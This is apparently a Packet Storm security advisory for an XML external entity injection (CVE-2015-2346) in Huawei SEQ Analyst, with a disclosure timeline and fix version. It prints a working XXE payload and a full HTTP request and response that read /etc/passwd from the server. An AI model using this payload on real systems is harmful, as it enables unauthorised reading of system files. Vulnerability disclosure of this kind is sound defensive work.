exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Huawei SEQ Analyst XXE Injection

Huawei SEQ Analyst XXE Injection
Posted Apr 16, 2015
Authored by Ugur Cihan KOC

Huawei SEQ Analyst version V200R002C03LG0001SPC100 suffers from an XML external entity injection vulnerability.

tags | exploit, xxe
advisories | CVE-2015-2346
SHA-256 | c7c2407779c7f1a975e407883855dddb3f3c26e41f43b310f77c4493aaafe71b

Huawei SEQ Analyst XXE Injection

Change Mirror Download
#Document Title:
============
Huawei SEQ Analyst - XML External Entity Injection (XXE)

#Release Date:
===========
15 Apr 2015

#CVE-ID:
=======
CVE-2015-2346

#Product & Service Introduction:
=======================
SEQ Analyst is a platform for business quality monitoring and management by
individual user and multiple vendors in a quasi-realtime and retraceable
manner
More Details & Manual ;
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101

#Vulnerability Disclosure Timeline:
========================
3 Mar 2015 Bug reported to the vendor.
6 Mar 2015 Vendor returned ; investigating
16 Mar 2015 Asked about the case.
16 Mar 2015 Vendor has validated the issue.
17 Mar 2015 There aren't any fix the issue.
18 Mar 2015 CVE number assigned
15 Apr 2015 Fixed

#Affected Product(s):
===============
Huawei Technologies Co. Ltd.
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be
vulnerable)

#Exploitation Technique:
=================
Local, Authenticated

#Technical Details:
========================
Target Path: /monitor/flexdata.action
Sample Payload : <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM
"file:///etc/passwd"> ]>
Affected Parameter: req

#Proof of Concept (PoC):
==================
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing

Request:

POST /monitor/flexdata.action HTTP/1.1
Host: ***:8443
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101
Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3;
org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US;
locale=en_US; locked=false;
timeNum=1425365144829; timeState=true; loginUserName=testsms;
CASTGC=TGT-549-
skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false
Connection: keep-alive
Referer: https://
***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5
Content-type: application/x-www-form-urlencoded
Content-Length: 136

req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<c
ommand>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B020
0%202015

Response:

HTTP/1.1 200 OK
Date: Tue, 03 Mar 2015 06:46:29 GMT
Server: Apache-Coyote/1.1
Cache- Control: no- cache, no-store
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 4281
<html>
<head>
<style type="text/css">

<tr class="row_even">
<td class="cell_object">1</td>
<td class="cell_object">2〕Command is
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:Daemon:/sbin:/bin/false
ftp:x:40:49:FTP account:/srv/ftp:/bin/false
root:x:0:0:root:/root:/bin/bash
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
webserver:x:360:1800::/home/webserver:/bin/bash
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash
httpd:x:361:1801::/home/httpd:/bin/bash
cognos:x:1002:1802::/home/cognos:/bin/bash
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>
</tr>
<tr class="row_odd">
...

#Solution Fix & Patch:
================
15 Apr 2015 Fixed version --> SEQ Analyst V200R002C03LG0001CP0022

#Credits & Authors:
==============
Ugur Cihan Koc
@_uceka_
www.uceka.com


Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    28 Files
  • 16
    Jul 16th
    6 Files
  • 17
    Jul 17th
    34 Files
  • 18
    Jul 18th
    6 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close